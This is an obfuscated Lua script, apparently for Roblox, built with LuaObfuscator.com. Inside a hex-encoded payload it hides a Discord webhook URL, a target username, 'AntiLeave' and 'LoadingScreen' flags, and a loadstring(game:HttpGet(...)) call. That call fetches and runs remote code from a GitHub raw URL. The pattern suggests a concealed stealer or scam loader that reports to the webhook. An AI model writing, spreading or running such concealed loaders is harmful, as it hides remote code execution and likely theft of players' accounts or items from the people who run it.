--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v83-(v83%1) ;else local v84=931 -(857 + 74) ;local v85;while true do if (0==v84) then v85=(570 -(58 + 309 + 201))^(v32-((1805 -(282 + 595)) -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and ((1638 -(1523 + 114)) + 0)) or 0 ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=(957 -(892 + 65)) + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==(1 -0)) then return (v38 * (16778281 -(68 + 997))) + (v37 * ((159367 -92561) -(226 + 232 + 812))) + (v36 * 256) + v35 ;end if ((0 -0)==v34) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 );v19=v19 + (121 -(32 + 85)) ;v34=1 + 0 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;while true do local v66=0 + 0 ;while true do if (v66==0) then if (v39==(15 -(9 + 5))) then v44=v24();v45={};for v102=1,v44 do local v103=0;local v104;local v105;local v106;local v107;while true do if (v103==1) then v106=nil;v107=nil;v103=2 -0 ;end if (0==v103) then v104=376 -(85 + 291) ;v105=nil;v103=1266 -(243 + 1022) ;end if (v103==(2 + 0)) then while true do if (v104~=(0 + 0)) then else v105=0 -0 ;v106=nil;v104=1;end if (v104==1) then v107=nil;while true do if (1==v105) then if (v106==(561 -(306 + 254))) then v107=v22()~=(0 + 0) ;elseif (v106==(3 -1)) then v107=v25();elseif (v106==(3 + 0)) then v107=v26();end v45[v102]=v107;break;end if (v105==(0 + 0)) then local v171=1180 -(1123 + 57) ;local v172;local v173;while true do if (v171==(1 + 0)) then while true do if (v172==(603 -(268 + 335))) then v173=254 -(163 + 91) ;while true do if (v173~=0) then else local v185=1930 -(1869 + 61) ;local v186;while true do if (v185==(572 -(426 + 146))) then v186=0 + 0 ;while true do if (v186==(0 + 0)) then v106=v22();v107=nil;v186=3 -2 ;end if (v186==1) then v173=1457 -(282 + 1174) ;break;end end break;end end end if ((812 -(569 + 242))~=v173) then else v105=2 -1 ;break;end end break;end end break;end if (v171==(0 -0)) then v172=1024 -(706 + 318) ;v173=nil;v171=1;end end end end break;end end break;end end end v43[1 + 2 ]=v22();v39=2 -0 ;end if (v39~=(2 + 0)) then else local v98=1474 -(1329 + 145) ;local v99;while true do if (v98==(0 + 0)) then v99=0;while true do if (v99~=(972 -(140 + 831))) then else return v43;end if (v99~=(1850 -(1409 + 441))) then else local v127=0 + 0 ;while true do if (v127~=(1500 -(1408 + 92))) then else for v174=719 -(15 + 703) ,v24() do local v175=0 + 0 ;local v176;local v177;while true do if (v175==(438 -(262 + 176))) then v176=1721 -(345 + 1376) ;v177=nil;v175=1;end if (v175~=(689 -(198 + 490))) then else while true do if (v176~=(0 -0)) then else v177=v22();if (v21(v177,1172 -(418 + 753) ,2 -1 )==0) then local v180=1206 -(696 + 510) ;local v181;local v182;local v183;local v184;while true do if ((3 -1)==v180) then while true do if (v181==(0 + 0)) then v182=v21(v177,1264 -(1091 + 171) ,1 + 2 );v183=v21(v177,12 -8 ,19 -13 );v181=530 -(406 + 123) ;end if (v181==(377 -(123 + 251))) then if (v21(v183,1772 -(1749 + 20) ,1 + 2 )==1) then v184[19 -15 ]=v45[v184[702 -(208 + 490) ]];end v40[v174]=v184;break;end if (v181~=(1 + 1)) then else local v190=0 + 0 ;local v191;while true do if (v190~=(836 -(660 + 176))) then else v191=0 + 0 ;while true do if (0~=v191) then else if (v21(v183,1 + 0 ,203 -(14 + 188) )==(676 -(534 + 141))) then v184[5 -3 ]=v45[v184[2]];end if (v21(v183,1 + 1 ,2 + 0 )~=(1 + 0)) then else v184[6 -3 ]=v45[v184[4 -1 ]];end v191=2 -1 ;end if (v191~=(1 + 0)) then else v181=3;break;end end break;end end end if (v181~=(2 -1)) then else v184={v23(),v23(),nil,nil};if (v182==(0 -0)) then local v194=114 -(4 + 110) ;local v195;local v196;while true do if (v194==(585 -(57 + 527))) then while true do if (v195==0) then v196=0 -0 ;while true do if (v196==(1427 -(41 + 1386))) then v184[3]=v23();v184[4 + 0 ]=v23();break;end end break;end end break;end if (v194~=(0 -0)) then else v195=0 -0 ;v196=nil;v194=868 -(550 + 317) ;end end elseif (v182==(2 -1)) then v184[3 -0 ]=v24();elseif (v182==(168 -(122 + 44))) then v184[3 -0 ]=v24() -(2^(44 -28)) ;elseif (v182==3) then local v203=285 -(134 + 151) ;local v204;local v205;local v206;while true do if (1~=v203) then else v206=nil;while true do if ((0 -0)==v204) then local v209=0 + 0 ;while true do if (v209==(0 + 0)) then v205=0 -0 ;v206=nil;v209=1;end if (v209==1) then v204=1666 -(970 + 695) ;break;end end end if (v204==(66 -(30 + 35))) then while true do if ((0 + 0)==v205) then v206=1257 -(1043 + 214) ;while true do if (v206==(0 -0)) then v184[3]=v24() -((3 -1)^(1228 -(323 + 889))) ;v184[10 -6 ]=v23();break;end end break;end end break;end end break;end if (v203==0) then v204=1990 -(582 + 1408) ;v205=nil;v203=321 -(53 + 267) ;end end end v181=1 + 1 ;end end break;end if ((0 -0)~=v180) then else local v187=0 -0 ;while true do if ((0 -0)==v187) then v181=1824 -(1195 + 629) ;v182=nil;v187=3 -2 ;end if ((1 -0)~=v187) then else v180=1;break;end end end if (v180~=(1 + 0)) then else local v188=0 + 0 ;while true do if (v188==1) then v180=2;break;end if (v188==(241 -(187 + 54))) then v183=nil;v184=nil;v188=851 -(20 + 830) ;end end end end end break;end end break;end end end for v178=781 -(162 + 618) ,v24() do v41[v178-(1 + 0) ]=v29();end v127=127 -(116 + 10) ;end if ((1 + 0)~=v127) then else v99=1 -0 ;break;end end end end break;end end end v66=1 -0 ;end if (v66~=(1 -0)) then else if (v39~=(0 + 0)) then else local v100=0;local v101;while true do if (v100==(1636 -(1373 + 263))) then v101=0;while true do if (v101==0) then v40={};v41={};v101=1001 -(451 + 549) ;end if ((1 + 0)~=v101) then else v42={};v43={v40,v41,nil,v42};v101=2;end if (v101==2) then v39=1385 -(746 + 638) ;break;end end break;end end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=406 -(118 + 287) ;local v49=(v21(v47,3 -(9 -7) ,1141 -(118 + 1003) ) * (2^(93 -61))) + v46 ;local v50=v21(v47,(1151 -(239 + 514)) -(142 + 235) ,140 -109 );local v51=((v21(v47,3 + 4 + (1354 -(797 + 532)) )==1) and  -(978 -(402 + 151 + 424))) or 1 ;if (v50==(0 -0)) then if (v49==(0 + 0 + 0)) then return v51 * (0 + 0) ;else v50=1 + 0 ;v48=0 + 0 ;end elseif (v50==2047) then return ((v49==(0 + (0 -0))) and (v51 * (((1204 -(373 + 829)) -1)/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-1023 ) * (v48 + (v49/((4 -2)^(16 + 36)))) ;end v26=nil;function v26(v52)local v53;if  not v52 then v52=v24();if (v52==(731 -(476 + 255))) then return "";end end v53=v3(v16,v19,(v19 + v52) -(1131 -(369 + 761)) );v19=v19 + v52 ;local v54={};for v67=1, #v53 do v54[v67]=v2(v1(v3(v53,v67,v67)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=0 + 0 + 0 ;local v56;while true do if (v55==0) then v56=v1(v16,v19,v19);v19=v19 + (1 -0) ;v55=(1 -0) -0 ;end if (v55==(239 -((400 -(144 + 192)) + 174))) then return v56;end end end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 );v19=v19 + (218 -(42 + 174)) ;return (v58 * (193 + 63)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v86=v2(v0(v59,16));if v20 then local v89=0;local v90;while true do if (v89==0) then v90=v5(v86,v20);v20=nil;v89=1;end if (v89==1) then return v90;end end else return v86;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v69=v63;local v70=v64;local v71=v65;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v87=0,v77 do if (v87>=v71) then v75[v87-v71 ]=v76[v87 + 1 ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v88=0;while true do if (v88==1) then if (v82<=5) then if (v82<=2) then if (v82<=0) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v62[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v62[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v62[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v62[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v62[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]][v81[3]]=v81[4];elseif (v82>1) then local v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=3) then v79[v81[2]]=v62[v81[3]];elseif (v82>4) then do return;end else v79[v81[2]]=v81[3];end elseif (v82<=8) then if (v82<=6) then local v116=0;local v117;local v118;local v119;local v120;local v121;while true do if (v116==0) then v117=nil;v118,v119=nil;v120=nil;v121=nil;v79[v81[2]][v81[3]]=v81[4];v116=1;end if (v116==3) then v79[v121 + 1 ]=v120;v79[v121]=v120[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v116=4;end if (v116==7) then v81=v69[v73];v79[v81[2]]();v73=v73 + 1 ;v81=v69[v73];do return;end break;end if (v116==4) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3]~=0 ;v73=v73 + 1 ;v81=v69[v73];v116=5;end if (v116==1) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v62[v81[3]];v73=v73 + 1 ;v81=v69[v73];v116=2;end if (v116==5) then v121=v81[2];v118,v119=v72(v79[v121](v13(v79,v121 + 1 ,v81[3])));v74=(v119 + v121) -1 ;v117=0;for v167=v121,v74 do v117=v117 + 1 ;v79[v167]=v118[v117];end v116=6;end if (v116==6) then v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v79[v121]=v79[v121](v13(v79,v121 + 1 ,v74));v73=v73 + 1 ;v116=7;end if (v116==2) then v79[v81[2]]=v62[v81[3]];v73=v73 + 1 ;v81=v69[v73];v121=v81[2];v120=v79[v81[3]];v116=3;end end elseif (v82==7) then v62[v81[3]]=v79[v81[2]];else v79[v81[2]]();end elseif (v82<=9) then local v122=v81[2];local v123=v79[v81[3]];v79[v122 + 1 ]=v123;v79[v122]=v123[v81[4]];elseif (v82==10) then local v135=v81[2];local v136,v137=v72(v79[v135](v13(v79,v135 + 1 ,v81[3])));v74=(v137 + v135) -1 ;local v138=0;for v164=v135,v74 do v138=v138 + 1 ;v79[v164]=v136[v138];end else v79[v81[2]][v81[3]]=v81[4];end v73=v73 + 1 ;break;end if (v88==0) then v81=v69[v73];v82=v81[1];v88=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D65030C3O0072692O7A7972692O7A72697A03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31332O31342O3839303430323436373839312F6B686C302D4872416A4B377A655853753967646B576E4E4D51747A466D3056456E64426351585270316A546F7250654D4733327966367579554E672O736C72663769645703093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O00124O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012033O00063O0030063O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);
